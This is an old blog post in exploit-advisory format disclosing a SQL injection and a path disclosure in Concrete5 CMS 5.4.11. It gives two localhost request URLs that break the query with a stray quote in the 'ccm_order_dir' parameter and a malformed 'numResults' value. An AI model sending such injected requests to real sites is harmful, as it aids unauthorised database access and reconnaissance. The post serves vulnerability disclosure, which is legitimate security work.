Saturday, 19 November 2011
SQLi/Info Disclo in Concrete 5.4.11
Another old bug...
# --------------------------------------------------------------------------- #
# - Title : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on : Ubuntu
# - Date : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author : ;)
# - Greetz :
# --------------------------------------------------------------------------- #
1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. Thats it!
* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment
What do You think...?